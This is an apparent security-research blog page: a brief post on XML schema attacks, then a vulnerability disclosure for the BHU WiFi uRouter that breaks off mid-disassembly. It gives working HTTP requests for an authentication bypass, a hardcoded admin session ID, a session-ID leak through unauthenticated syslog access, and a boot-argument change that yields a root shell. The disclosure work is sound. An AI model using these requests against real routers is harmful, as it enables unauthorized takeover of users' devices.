RESEARCH | October 18, 2016

Let’s Terminate XML Schema Vulnerabilities

XML eXternal Entity (XXE) attacks are a common threat to applications using XML schemas, either actively or unknowingly. That is because we continue to use XML schemas that can be abused in multiple ways. Programming languages and libraries use XML schemas to define the expected contents of XML documents, SAML authentications or SOAP messages. XML schemas were intended to constrain document definitions, yet they have introduced multiple attack avenues.

XML parsers should be prepared to manage two types of problematic XML documents: malformed files and invalid files. Malformed files do not follow the World Wide Web Consortium (W3C) specification, which can lead to unexpected consequences for any software that parses them. Invalid files abuse XML schemas and exploit actions that are built into programming languages and libraries. This may unwittingly put any software relying on these technologies at risk.

I analyzed possible attacks affecting XML and discovered new attacks in both of these categories. Among them:

  • Schema version disclosure: Parsers may disclose type and version information when retrieving remote schemas.
  • Unrestrictive schemas: Major companies still rely on schemas that cannot provide the restrictions required for their XML documents. DTD schemas continue to be common, even though they are often unable to accomplish their goal.
  • Improper data validation: As companies move away from DTD schemas and attempt to implement better restrictions, they may provide incomplete protection for their systems. XML schemas provide highly granular constraints, and if they are not properly defined, the approved document may affect the underlying security of applications.

Some of the examples proposed by the W3C include vulnerable methods of defining XML documents. To illustrate with a basic example, the W3C states that an application can use a DTD to verify that XML data is valid, and provides the following example:

<?xml version="1.0"?>
<!DOCTYPE note [
  <!ELEMENT note (to,from,heading,body)>
  <!ELEMENT to (#PCDATA)>
  <!ELEMENT from (#PCDATA)>
  <!ELEMENT heading (#PCDATA)>
  <!ELEMENT body (#PCDATA)>
]>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend</body>
</note>

This example document contains an embedded DTD that constrains the contents to the previously defined elements. However, those elements do not constrain how large the data is or what type of data it contains. Moreover, since the DTD declaration can simply be changed or removed from the document, you can even have a perfectly well-formed document with no XML schema at all.
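The last point is easy to verify with any standards-compliant parser. As a minimal sketch (mine, not the W3C's) in Python, the same note with its DTD stripped, and with an arbitrarily oversized body, parses without complaint:

```python
import xml.etree.ElementTree as ET

# The same W3C note, with the embedded DTD removed entirely.
doc = """<?xml version="1.0"?>
<note>
  <to>Tove</to>
  <from>Jani</from>
  <heading>Reminder</heading>
  <body>Don't forget me this weekend</body>
</note>"""

# Parses fine: well-formedness requires no schema at all.
root = ET.fromstring(doc)
print(root.find("body").text)

# Nothing constrains element size or type either: a body holding a
# million characters is just as acceptable to the parser.
huge = doc.replace("Don't forget me this weekend", "A" * 1_000_000)
print(len(ET.fromstring(huge).find("body").text))
```

Any validation the DTD was supposed to provide simply disappears along with it, and the parser has no way to notice.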

For more details and greater depth on this topic, view the full white paper, Assessing and Exploiting XML Schema’s Vulnerabilities.

As always, we would love to hear from other security types who might have a differing opinion. All of our positions are subject to change through exposure to compelling arguments and/or data.

RESEARCH | August 17, 2016

Multiple Vulnerabilities in BHU WiFi “uRouter”

A Wonderful (and !Secure) Router from China

The BHU WiFi uRouter, manufactured and sold in China, looks great – and it contains multiple critical vulnerabilities. An unauthenticated attacker could bypass authentication, access sensitive information stored in its system logs, and, in the worst case, execute OS commands on the router with root privileges. In addition, the uRouter ships with hidden users, SSH enabled by default, and a hardcoded root password…and it injects a third-party JavaScript file into all users’ HTTP traffic.

In this blog post, we cover the main security issues found on the router, and describe how to exploit the UART debug pins to extract the firmware and find security vulnerabilities.

Souvenir from China

During my last trip to China, I decided to buy some souvenirs. By “souvenirs”, I mean Chinese brand electronic devices that I couldn’t find at home.

I found the BHU WiFi uRouter, a very nice looking router, for €60. Using a translator on the vendor’s webpage, its Chinese name translated to “Tiger Will Power”, which seemed a little bit off. Instead, I renamed it “uRouter” after the URL of its product page – http://www.bhuwifi.com/product/urouter_gs.html.

Of course, everything in the administrative web interface was in Chinese, without an option to switch to English. Translators did not help much, so I decided to open it up and see if I could access the firmware.

Extracting the Firmware using UART


If you look at the photo above, there appear to be UART pins (red) with the connector still attached, and an SD card (orange). I used a Bus Pirate to connect to the pins.
 

I booted the device and watched my terminal:

 

U-Boot 1.1.4 (Aug 19 2015 - 08:58:22)
 
BHU Urouter
DRAM: 
sri
Wasp 1.1
wasp_ddr_initial_config(249): (16bit) ddr2 init
wasp_ddr_initial_config(426): Wasp ddr init done
Tap value selected = 0xf [0x0 – 0x1f]
Setting 0xb8116290 to 0x23462d0f
64 MB
Top of RAM usable for U-Boot at: 84000000
Reserving 270k for U-Boot at: 83fbc000
Reserving 192k for malloc() at: 83f8c000
Reserving 44 Bytes for Board Info at: 83f8bfd4
Reserving 36 Bytes for Global Data at: 83f8bfb0
Reserving 128k for boot params() at: 83f6bfb0
Stack Pointer at: 83f6bf98
Now running in RAM – U-Boot at: 83fbc000
Flash Manuf Id 0xc8, DeviceId0 0x40, DeviceId1 0x18
flash size 16MB, sector count = 256
Flash: 16 MB
In:    serial
Out:   serial
Err:   serial
 
 ______  _     _ _     _
 |_____] |_____| |     |
 |_____] |     | |_____| Networks Co'Ltd Inc.
 
Net:   ag934x_enet_initialize…
No valid address in Flash. Using fixed address
No valid address in Flash. Using fixed address
 wasp  reset mask:c03300
WASP ----> S27 PHY
: cfg1 0x80000000 cfg2 0x7114
eth0: 00:03:7f:09:0b:ad
s27 reg init
eth0 setup
WASP ----> S27 PHY
: cfg1 0x7 cfg2 0x7214
eth1: 00:03:7f:09:0b:ad
s27 reg init lan
ATHRS27: resetting done
eth1 setup
eth0, eth1
Http reset check.
Trying eth0
eth0 link down
FAIL
Trying eth1
eth1 link down
FAIL
Hit any key to stop autoboot:  0 (1)

 

/* [omitted] */
Pressing a key (1) stopped the booting process and landed me on the following bootloader menu (the typos are not mine):

##################################
#   BHU Device bootloader menu   #
##################################
[1(t)] Upgrade firmware with tftp
[2(h)] Upgrade firmware with httpd
[3(a)] Config device aerver IP Address
[4(i)] Print device infomation
[5(d)] Device test
[6(l)] License manager
[0(r)] Redevice
[ (c)] Enter to commad line (2)

I pressed c to access the command line (2). Since it’s using U-Boot (as specified in the serial output), I could modify the bootargs parameter and pop a shell instead of running the init program:

Please input cmd key:
CMD> printenv bootargs
bootargs=board=Urouter console=ttyS0,115200 root=31:03 rootfstype=squashfs,jffs2 init=/sbin/init (3)mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)
CMD> setenv bootargs board=Urouter console=ttyS0,115200 rw rootfstype=squashfs,jffs2 init=/bin/sh (4) mtdparts=ath-nor0:256k(u-boot),64k(u-boot-env),1408k(kernel),8448k(rootfs),1408k(kernel2),1664k(rescure),2944kr),64k(cfg),64k(oem),64k(ART)

 

CMD> boot (5)
 
Checking the default U-Boot configuration (3) with the printenv command shows that it will run '/sbin/init' as soon as the booting sequence finishes. This binary is responsible for initializing the router's Linux operating system.
Replacing '/sbin/init' with '/bin/sh' (4) using the setenv command runs the shell binary instead, so that we can access the filesystem. The boot command (5) tells U-Boot to continue the boot sequence we just paused. After a lot of debug information, we get the shell:

 

 
BusyBox v1.19.4 (2015-09-05 12:01:45 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
 
# ls
version  upgrade  sbin     proc     mnt      init     dev
var      tmp      root     overlay  linuxrc  home     bin
usr      sys      rom      opt      lib      etc
 

 

With shell access to the router, I could then extract the firmware and start analyzing the Common Gateway Interface (CGI) binaries responsible for handling the administrative web interface.

There were multiple ways to extract files from the router at that point. I modified the U-Boot parameters to enable the network (http://www.denx.de/wiki/view/DULG/LinuxBootArgs) and used scp (available on the router) to copy everything to my laptop.  

Another way to do this would be to analyze the recovery.img firmware image stored on the SD card. However, this would risk missing pre-installed files or configuration settings that are not in the recovery image.

Reverse Engineering the CGI Binaries
 

My first objective was to understand which software is handling the administrative web interface, and how. Here’s the startup configuration of the router:

 

# cat /etc/rc.d/rc.local
/* [omitted] */
mongoose -listening_ports 80 &

 

/* [omitted] */
Mongoose is a web server commonly found on embedded devices. Since no mongoose.conf file appears on the router, it uses the default configuration. According to the documentation, Mongoose interprets all files ending in .cgi as CGI binaries by default, and there are two on the router’s filesystem:

 

# ls -al /usr/share/www/cgi-bin/
drwxrwxr-x    2        52 .
drwxr-xr-x    2         0 ..
-rwxrwxr-x    1     29792 cgiSrv.cgi
-rwxrwxr-x    1     16260 cgiPage.cgi

The administrative web interface relies on two binaries: 

  1. cgiPage.cgi, which seems to handle the web panel home page (http://192.168.62.1/cgi-bin/cgiPage.cgi?pg=urouter (resource no longer available))
  2. cgiSrv.cgi, which handles the administrative functions (such as logging in and out, querying system information, or modifying the system configuration)

The cgiSrv.cgi binary appeared to be the most interesting, since it can update the router’s configuration, so I started with that.

 

$ file cgiSrv.cgi
cgiSrv.cgi: ELF 32-bit MSB executable, MIPS, MIPS32 rel2 version 1 (SYSV), dynamically linked (uses shared libs), stripped

Although the binary is stripped of all debugging symbols such as function names, it’s quite easy to understand when starting from the main function. For analysis of the binaries, I used IDA:

 
LOAD:00403C48  # int __cdecl main(int argc, const char **argv, const char **envp)
LOAD:00403C48                 .globl main
LOAD:00403C48 main:                                    # DATA XREF: _ftext+18|o
/* [omitted] */
LOAD:00403CE0                 la      $t9, getenv
LOAD:00403CE4                 nop
                          (6) # Retrieve the request method
LOAD:00403CE8                 jalr    $t9 ; getenv
                          (7) # arg0 = "REQUEST_METHOD"
LOAD:00403CEC                 addiu   $a0, $s0, (aRequest_method - 0x400000)  # "REQUEST_METHOD"
LOAD:00403CF0                 lw      $gp, 0x20+var_10($sp)
LOAD:00403CF4                 lui     $a1, 0x40
                          (8) # arg0 = getenv("REQUEST_METHOD")
LOAD:00403CF8                 move    $a0, $v0
LOAD:00403CFC                 la      $t9, strcmp
LOAD:00403D00                 nop
                          (9) # Check if the request method is POST
LOAD:00403D04                 jalr    $t9 ; strcmp
                          (10) # arg1 = "POST"
LOAD:00403D08                 la      $a1, aPost       # "POST"
LOAD:00403D0C                 lw      $gp, 0x20+var_10($sp)
                          (11) # Jump if not POST request
LOAD:00403D10                 bnez    $v0, loc_not_post
LOAD:00403D14                 nop
                          (12) # Call handle_post if POST request
LOAD:00403D18                 jal     handle_post
LOAD:00403D1C                 nop

/* [omitted] */


The main function starts by calling getenv (6) to retrieve the request method stored in the environment variable REQUEST_METHOD (7). It then calls strcmp (9) to compare the REQUEST_METHOD value (8) with the string "POST" (10). If the strings match, the branch at (11) is not taken, and the function at (12) is called.

In other words, whenever a POST request is received, the function in (12) is called. I renamed it handle_post for clarity. 

The same logic applies for GET requests, where if a GET request is received it calls the corresponding handler function, renamed handle_get.
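Condensed, the dispatch that the disassembly implements boils down to a few lines. A sketch of my own follows (the real binary is C, and handle_post/handle_get are my renamed IDA labels):

```python
import os

def dispatch_request(environ=os.environ):
    """Sketch of cgiSrv.cgi's main(): pick a handler by REQUEST_METHOD,
    which the web server exposes to CGI programs as an environment
    variable. Returns the name of the handler that would run."""
    method = environ.get("REQUEST_METHOD")
    if method == "POST":
        return "handle_post"   # strcmp(method, "POST") == 0 path
    if method == "GET":
        return "handle_get"    # the equivalent GET comparison
    return None                # any other method is ignored
```

For example, `dispatch_request({"REQUEST_METHOD": "POST"})` selects the POST handler, mirroring the strcmp-and-branch sequence annotated above.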

Let’s start with handle_get, which looks simpler than the POST handler.

The cascade-like series of blocks could indicate an “if {} else if {} else {}” pattern, where each test will check for a supported GET operation.

Focusing on Block A:

 

/* [omitted] */
LOAD:00403B3C loc_403B3C:                              # CODE XREF: handle_get+DC|j
LOAD:00403B3C                 la      $t9, find_val
                          (13) # arg1 = "file"
LOAD:00403B40                 la      $a1, aFile       # "file"
                          (14) # Retrieve value of parameter "file" from URL
LOAD:00403B48                 jalr    $t9 ; find_val
                          (15) # arg0 = url
LOAD:00403B4C                 move    $a0, $s2  # s2 = URL
LOAD:00403B50                 lw      $gp, 0x130+var_120($sp)
                          (16) # Jump if URL not like "?file="
LOAD:00403B54                 beqz    $v0, loc_not_file_op
LOAD:00403B58                 move    $s0, $v0
                          (17) # Call handler for “file” operation
LOAD:00403B5C                 jal     get_file_handler
LOAD:00403B60                 move    $a0, $v0

In Block A, handle_get checks for the string "file" (13) in the URL parameters (15) by calling find_val (14). If the string appears (16), the function get_file_handler is called (17).

 

 

LOAD:00401210 get_file_handler:                        # CODE XREF: handle_get+140|p
/* [omitted] */
LOAD:004012B8 loc_4012B8:                              # CODE XREF: get_file_handler+98j
LOAD:004012B8                 lui     $s0, 0x41
LOAD:004012BC                 la      $t9, strcmp
                          (18) # arg0 = Value of parameter "file"
LOAD:004012C0                 addiu   $a1, $sp, 0x60+var_48
                          (19) # arg1 = "syslog"
LOAD:004012C4                 lw      $a0, file_syslog  # "syslog"
LOAD:004012C8                 addu    $v0, $a1, $v1
                          (20) # Is value of file "syslog"?
LOAD:004012CC                 jalr    $t9 ; strcmp
LOAD:004012D0                 sb      $zero, 0($v0)
LOAD:004012D4                 lw      $gp, 0x60+var_50($sp)
                          (21) # Jump if value of "file" != "syslog"
LOAD:004012D8                 bnez    $v0, loc_not_syslog
LOAD:004012DC                 addiu   $v0, $s0, (file_syslog - 0x410000)
                          (22) # Return "/var/syslog" if "syslog"
LOAD:004012E0                 lw      $v0, (path_syslog - 0x416500)($v0)  # "/var/syslog"
LOAD:004012E4                 b       loc_4012F0
LOAD:004012E8                 nop
LOAD:004012EC  # ---------------------------------------------------------------------------
LOAD:004012EC loc_4012EC:                              # CODE XREF: get_file_handler+C8|j
                          (23) # Return NULL otherwise
LOAD:004012EC                 move    $v0, $zero

The function get_file_handler checks whether the value of the URL parameter file (18) is "syslog" (19) by calling strcmp (20). If it is (21), it returns the string "/var/syslog" (22); otherwise, it returns NULL (23). Next, a function is called to open /var/syslog, read its contents, and write them to the server's HTTP response. This execution flow is straightforward: it took a mere couple of minutes to find the handler for GET requests and understand how requests were processed.
Looking at the reverse-engineered blocks, we can see the following GET operations:
  • page=[<html page name>]
    • Append “.html” to the HTML page name
    • Open the file and return its content
    • If you’re wondering, yes, it is vulnerable to path traversal, but restricted to .html files. I could not find a way to bypass the extension restriction.
  • xml=[<configuration name>]
    • Access the configuration name
    • Return the value in XML format
  • file=[syslog]
    • Access /var/syslog
    • Open the file and return its content
  • cmd=[system_ready]
    • Return the first and last letters of the admin password (reducing the entropy of the password and making it easier for an attacker to brute-force)
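Condensed into pseudocode (a sketch of my own; the return values merely indicate which resource each operation exposes), the recovered GET dispatch looks like:

```python
def handle_get(params):
    """Summary of the GET operations recovered from cgiSrv.cgi.
    `params` stands in for the parsed URL query string."""
    if "page" in params:
        # Path traversal is possible here, but limited to .html files.
        return params["page"] + ".html"
    if "xml" in params:
        return "config:" + params["xml"]     # config value rendered as XML
    if "file" in params:
        # Only the literal value "syslog" maps to a file path.
        return "/var/syslog" if params["file"] == "syslog" else None
    if params.get("cmd") == "system_ready":
        return "admin-password hint (first and last letters)"
    return None
```

Note that nothing in this flow ever consults a session identifier, which is exactly the problem explored next.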

Did We Forget to Invite Authentication to the Party? Zut…

 
But wait – when accessing syslog, does it check for an authenticated user? To all appearances, at no point does the cgiSrv.cgi binary check for authentication when accessing the router’s system logs.

Well, maybe the logs don’t contain any sensitive information…

Request:

 

GET /cgi-bin/cgiSrv.cgi?file=syslog HTTP/1.1
Host: 192.168.62.1
X-Requested-With: XMLHttpRequest

Connection: close

 

Response:

HTTP/1.1 200 OK
Content-type: text/plain
 
Jan  1 00:00:09 BHU syslog.info syslogd started: BusyBox v1.19.4
Jan  1 00:00:09 BHU user.notice kernel: klogger started!
Jan  1 00:00:09 BHU user.notice kernel: Linux version 2.6.31-BHU (yetao@BHURD-Software) (gcc version 4.3.3 (GCC) ) #1 Thu Aug 20 17:02:43 CST 201
/* [omitted] */
Jan  1 00:00:11 BHU local0.err dms[549]: Admin:dms:3 sid:700000000000000 id:0 login
/* [omitted] */

Jan  1 08:02:19 HOSTNAME local0.warn dms[549]: User:admin sid:2jggvfsjkyseala index:3 login     

…Or maybe they do. As seen above, these logs contain, among other information, the session ID (SID) value of the admin cookie. If we use that cookie value in our browser, we can hijack the admin session and reboot the device:

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://192.168.62.1/
Cookie: sid=2jggvfsjkyseala;
Content-Length: 9
Connection: close
 

 

op=reboot

Response:

 
HTTP/1.1 200 OK
Content-type: text/plain
 
result=ok
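The log-scraping step above is easy to script. Here is a small helper of my own (assuming only the log format shown earlier) that pulls every leaked session ID out of a syslog dump:

```python
import re

def extract_sids(syslog_text):
    """Collect session IDs leaked in uRouter syslog lines such as
    'User:admin sid:2jggvfsjkyseala index:3 login'."""
    return re.findall(r"\bsid:(\w+)", syslog_text)

# Sample lines taken from the router's actual syslog output.
log = (
    "Jan  1 00:00:11 BHU local0.err dms[549]: "
    "Admin:dms:3 sid:700000000000000 id:0 login\n"
    "Jan  1 08:02:19 HOSTNAME local0.warn dms[549]: "
    "User:admin sid:2jggvfsjkyseala index:3 login\n"
)
print(extract_sids(log))
```

Any value it returns can be dropped straight into a `Cookie: sid=...` header to hijack the corresponding session.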


But wait, there’s more! In the (improbable) scenario where the admin has never logged into the router, and therefore doesn’t have an SID cookie value in the system logs, we can still use the hardcoded SID: 700000000000000. Did you notice it in the system log we saw earlier?

 

/* [omitted] */
Jan  1 00:00:11 BHU local0.err dms[549]: Admin:dms:3 sid:700000000000000 id:0 login

 

/* [omitted] */
This SID is constant across reboots, and the admin can’t change it. This provides us with access to all authenticated features. How nice! 🙂

Request to check which user we are: 

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 7
Cookie: sid=700000000000000
Connection: close
 
op=user

Response:

 
HTTP/1.1 200 OK
Content-type: text/plain
 
user=dms:3

Who is dms:3? It’s not referenced anywhere on the administrative web interface. Is it a bad design choice, a hack from the developers? Or is it some kind of backdoor account?

Could It Be More Broken?

 
Now that we can access the web interface with admin privileges, let’s push on a little bit further. Let’s have a look at the POST handler function and see if we can find something more interesting. 

Checking the graph overview of the POST handler in IDA, it looks scarier than the GET handler. However, we'll split the work into smaller tasks in order to understand what happens.

In the snippet above, we can see a structure similar to the GET handler's: a cascade-like series of blocks. In Block A, we have the following:

 
LOAD:00403424                 la      $t9, cgi_input_parse
LOAD:00403428                 nop
                          (24) # Call cgi_input_parse()
LOAD:0040342C                 jalr    $t9 ; cgi_input_parse
LOAD:00403430                 nop
LOAD:00403434                 lw      $gp, 0x658+var_640($sp)
                          (25) # arg1 = "op"
LOAD:00403438                 la      $a1, aOp         # "op"
LOAD:00403440                 la      $t9, find_val
                          (26) # arg0 = Body of the request
LOAD:00403444                 move    $a0, $v0
                          (27) # Get value of parameter “op”
LOAD:00403448                 jalr    $t9 ; find_val
LOAD:0040344C                 move    $s1, $v0
LOAD:00403450                 move    $s0, $v0
LOAD:00403454                 lw      $gp, 0x658+var_640($sp)
                          (28) # No "op" parameter, then exit
LOAD:00403458                 beqz    $s0, b_exit

 

This block parses the body of the POST requests (24) and tries to extract the value of the parameter op (25) from the body (26) by calling the function find_val (27). If find_val returns NULL (i.e., the value of op does not exist), it goes straight to the end of the function (28). Otherwise, it continues towards Block B.
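find_val itself is just a key/value lookup over the urlencoded request body. A reconstruction sketch (the name is my IDA label; the real code is C):

```python
def find_val(body, key):
    """Return the value of `key` in a urlencoded body such as
    'op=reboot&x=1', or None if the key is absent -- mirroring the
    NULL return the disassembly branches on at (28)."""
    for pair in body.split("&"):
        k, _, v = pair.partition("=")
        if k == key:
            return v
    return None

print(find_val("op=reboot", "op"))
print(find_val("foo=bar", "op"))
```

When `find_val` returns None for "op", the handler exits immediately; otherwise the value drives the strcmp cascade in Block B.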
 

Block B does the following:

 

 

LOAD:004036B4                 la      $t9, strcmp
                          (29) # arg1 = "reboot"
LOAD:004036B8                 la      $a1, aReboot     # "reboot"
                          (30) # Is “op” the command “reboot”?
LOAD:004036C0                 jalr    $t9 ; strcmp
                          (31) # arg0 = body[“op”]
LOAD:004036C4                 move    $a0, $s0
LOAD:004036C8                 lw      $gp, 0x658+var_640($sp)
LOAD:004036CC                 bnez    $v0, loc_403718
LOAD:004036D0                 lui     $s2, 0x40
 

 

It calls the strcmp function (30) with the result of find_val from Block A as the first parameter (31). The second parameter is the string "reboot" (29). If the op parameter has the value reboot, it moves on to Block C:

 

                          (32) # Retrieve the cookie SID value
LOAD:004036D4                 jal     get_cookie_sid
LOAD:004036D8                 nop
LOAD:004036DC                 lw      $gp, 0x658+var_640($sp)
                          (33) # SID cookie passed as first parameter for dml_dms_ucmd
LOAD:004036E0                 move    $a0, $v0
LOAD:004036E4                 li      $a1, 1
LOAD:004036E8                 la      $t9, dml_dms_ucmd
LOAD:004036EC                 li      $a2, 3
LOAD:004036F0                 move    $a3, $zero
                          (34) # Dispatch the work to dml_dms_ucmd
LOAD:004036F4                 jalr    $t9 ; dml_dms_ucmd
LOAD:004036F8                 nop

 

It first calls a function I renamed get_cookie_sid (32), passes the returned value to dml_dms_ucmd (33) and calls it (34). Then it moves on:

 

                          (35) # Save returned value in v1
LOAD:004036FC                 move    $v1, $v0
LOAD:00403700                 li      $v0, 0xFFFFFFFE
LOAD:00403704                 lw      $gp, 0x658+var_640($sp)
                          (36) # Is v1 != 0xFFFFFFFE?
LOAD:00403708                 bne     $v1, $v0, loc_403774
LOAD:0040370C                 lui     $a0, 0x40
                          (37) # If v1 == 0xFFFFFFFE jump to error message
LOAD:00403710                 b       loc_need_login
LOAD:00403714                 nop
/* [omitted] */
LOAD:00403888 loc_need_login:                              # CODE XREF: handle_post+9CC|j
LOAD:00403888                 la      $t9, mime_header
LOAD:0040388C                 nop
LOAD:00403890                 jalr    $t9 ; mime_header
LOAD:00403894                 addiu   $a0, (aTextXml - 0x400000)  # "text/xml"
LOAD:00403898                 lw      $gp, 0x658+var_640($sp)
LOAD:0040389C                 lui     $a0, 0x40
                          (38) # Show error message "need_login"
LOAD:004038A0                 la      $t9, printf
LOAD:004038A4                 b       loc_4038D0
LOAD:004038A8                 la      $a0, aReturnItemResu  # "<return>\n\t<ITEM result=\"need_login\""...

It checks the return value of dml_dms_ucmd (35) against 0xFFFFFFFE, or -2 as a signed integer (36). If they differ, the command succeeded; if they are equal (37), it displays the need_login error message (38).

For instance, when no SID cookie is specified, we observe the following response from the server.

Request without any cookie:    
  

 

POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 9
Connection: close

 

op=reboot
 

  Response:    

 

HTTP/1.1 200 OK
Content-type: text/xml
 
<return>
      <ITEM result="need_login"/>
</return>

 

The same pattern occurs for the other operations:
  • Receive a POST request with op=<name>
  • Call get_cookie_sid
  • Call dml_dms_ucmd

This is a major difference compared to the GET handler. While the GET handler performs the action right away – no questions asked – the POST handler refers to the SID cookie at some point. But how is it used?

First, we check to see what get_cookie_sid does:

 

LOAD:004018C4 get_cookie_sid:                          # CODE XREF: get_xml_handle+20|p
/* [omitted] */
LOAD:004018DC                 la      $t9, getenv
LOAD:004018E0                 lui     $a0, 0x40
                          (39) # Get HTTP cookies
LOAD:004018E4                 jalr    $t9 ; getenv
LOAD:004018E8                 la      $a0, aHttp_cookie  # "HTTP_COOKIE"
LOAD:004018EC                 lw      $gp, 0x20+var_10($sp)
LOAD:004018F0                 beqz    $v0, failed
LOAD:004018F4                 lui     $a1, 0x40
LOAD:004018F8                 la      $t9, strstr
LOAD:004018FC                 move    $a0, $v0
                          (40) # Is there a cookie containing "sid="?
LOAD:00401900                 jalr    $t9 ; strstr
LOAD:00401904                 la      $a1, aSid        # "sid="
LOAD:00401908                 lw      $gp, 0x20+var_10($sp)
LOAD:0040190C                 beqz    $v0, failed
LOAD:00401910                 move    $v1, $v0
/* [omitted] */
LOAD:00401954 loc_401954:                              # CODE XREF: get_cookie_sid+6C|j
LOAD:00401954                 addiu   $s0, (session_buffer - 0x410000)
LOAD:00401958
LOAD:00401958 loc_401958:                              # CODE XREF: get_cookie_sid+74|j
LOAD:00401958                 la      $t9, strncpy
LOAD:0040195C                 addu    $v0, $a2, $s0
LOAD:00401960                 sb      $zero, 0($v0)
                          (41) # Copy value of cookie in "session_buffer"
LOAD:00401964                 jalr    $t9 ; strncpy
LOAD:00401968                 move    $a0, $s0
LOAD:0040196C                 lw      $gp, 0x20+var_10($sp)
LOAD:00401970                 b       loc_40197C
                          (42) # Return the value of the cookie
LOAD:00401974                 move    $v0, $s0

In short, get_cookie_sid retrieves the HTTP cookies sent with the POST request (39) and checks whether any cookie contains sid in its name (40). It then saves the cookie value in a global variable (41) and returns it (42).


The returned value then passes as the first parameter when calling dml_dms_ucmd (implemented in the libdml.so library). The authentication check surely must be in this function, right? Let’s have a look:

 

.text:0003B368                 .globl dml_dms_ucmd
.text:0003B368 dml_dms_ucmd:
/* [omitted] */
.text:0003B3A0                 move    $s3, $a0
.text:0003B3A4                 beqz    $v0, loc_3B71C
.text:0003B3A8                 move    $s4, $a3
                           (43) # Remember that a0 = SID cookie value.
                               # In other words, if a0 is NULL, s1 = 0xFFFFFFFE
.text:0003B3AC                 beqz    $a0, loc_exit_function
.text:0003B3B0                 li      $s1, 0xFFFFFFFE
/* [omitted] */
.text:0003B720 loc_exit_function:                           # CODE XREF: dml_dms_ucmd+44|j
.text:0003B720                                          # dml_dms_ucmd+390|j …
.text:0003B720                 lw      $ra, 0x40+var_4($sp)
                           (44) # Return s1 (s1 = 0xFFFFFFFE)
.text:0003B724                 move    $v0, $s1
/* [omitted] */
.text:0003B73C                 jr      $ra
.text:0003B740                 addiu   $sp, 0x40

 

.text:0003B740  # End of function dml_dms_ucmd

 

Above is the only reference to 0xFFFFFFFE (-2) I could find in dml_dms_ucmd. The function will return -2 (44) when its first parameter is NULL (43), meaning only when the SID is NULL.

…Wait a second…that would mean that…no, it can’t be that broken?

Here’s a request with a random cookie value:

 

 
POST /cgi-bin/cgiSrv.cgi HTTP/1.1
Host: 192.168.62.1
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Cookie: abcsid=def
Content-Length: 9
Connection: close
 
op=reboot

Response:

HTTP/1.1 200 OK
Content-type: text/plain
 
result=ok

Yes, it does mean that whatever SID cookie value you provide, the router will accept it as proof that you’re an authenticated user!
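The root cause sits in the two functions we just walked through: get_cookie_sid locates the SID with strstr rather than parsing cookie names, and dml_dms_ucmd only rejects a NULL SID. A sketch of my own reconstructing the flawed logic:

```python
def get_cookie_sid(http_cookie):
    """Mimic the binary: strstr(cookies, "sid=") and copy what follows.
    Because strstr matches substrings, any cookie whose name merely
    *contains* 'sid' is accepted."""
    if http_cookie is None:
        return None
    idx = http_cookie.find("sid=")        # strstr, not a cookie-name match
    if idx == -1:
        return None
    return http_cookie[idx + len("sid="):].split(";")[0]

def dml_dms_ucmd_auth(sid):
    """The only check: return -2 ('need_login') when sid is NULL."""
    return -2 if sid is None else 0

# "abcsid=def" is not a cookie named sid, yet it passes both checks:
sid = get_cookie_sid("abcsid=def")
print(sid, dml_dms_ucmd_auth(sid))
```

So any request carrying any string containing "sid=" in its Cookie header authenticates, exactly as the reboot request above demonstrated.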

From Admin to Root

So far, we have three possible ways to gain admin access to the router’s administrative web interface:
  • Provide any SID cookie value
  • Read the system logs and use the listed admin SID cookie values
  • Use the hardcoded hidden 700000000000000 SID cookie value


Our next step is to try elevating our privileges from admin to root user.

We have analyzed the POST request handler and understood how the op requests were processed, but the POST handler can also handle XML requests:

 

/* [omitted] */
LOAD:00402E2C                 addiu   $a0, $s2, (aContent_type - 0x400000)  # "CONTENT_TYPE"
LOAD:00402E30                 la      $t9, getenv
LOAD:00402E34                 nop
                          (45) # Get the "CONTENT_TYPE" of the request
LOAD:00402E38                 jalr    $t9 ; getenv
LOAD:00402E3C                 lui     $s0, 0x40
LOAD:00402E40                 lw      $gp, 0x658+var_640($sp)
LOAD:00402E44                 move    $a0, $v0
LOAD:00402E48                 la      $t9, strstr
LOAD:00402E4C                 nop
                          (46) # Is it a "text/xml" request?
LOAD:00402E50                 jalr    $t9 ; strstr
LOAD:00402E54                 addiu   $a1, $s0, (aTextXml - 0x400000)  # "text/xml"
LOAD:00402E58                 lw      $gp, 0x658+var_640($sp)
LOAD:00402E5C                 beqz    $v0, b_content_type_specified
/* [omitted] */
                          (47) # Get SID cookie value
LOAD:00402F88                 jal     get_cookie_sid
LOAD:00402F8C                 and     $s0, $v0
LOAD:00402F90                 lw      $gp, 0x658+var_640($sp)
LOAD:00402F94                 move    $a1, $s0
LOAD:00402F98                 sw      $s1, 0x658+var_648($sp)
LOAD:00402F9C                 la      $t9, dml_dms_uxml
LOAD:00402FA0                 move    $a0, $v0
LOAD:00402FA4                 move    $a2, $s3
                          (48) # Calls 'dml_dms_uxml' with request body and SID cookie value
LOAD:00402FA8                 jalr    $t9 ; dml_dms_uxml

LOAD:00402FAC                 move    $a3, $s2

When receiving a request with a content type (45) containing text/xml (46), the POST handler retrieves the SID cookie value (47) and calls dml_dms_uxml (48), implemented in libdml.so. Somehow, dml_dms_uxml is even nicer than dml_dms_ucmd:

 

 

.text:0003AFF8                 .globl dml_dms_uget_xml
.text:0003AFF8 dml_dms_uget_xml:
/* [omitted] */
                           (49) # Copy SID in s1
.text:0003B030                 move    $s1, $a0
.text:0003B034                 beqz    $a2, loc_3B33C
.text:0003B038                 move    $s5, $a3
                           (50) # If SID is NULL
.text:0003B03C                 bnez    $a0, loc_3B050
.text:0003B040                 nop
.text:0003B044                 la      $v0, unk_170000
.text:0003B048                 nop
                           (51) # Replace NULL SID with the hidden hardcoded one
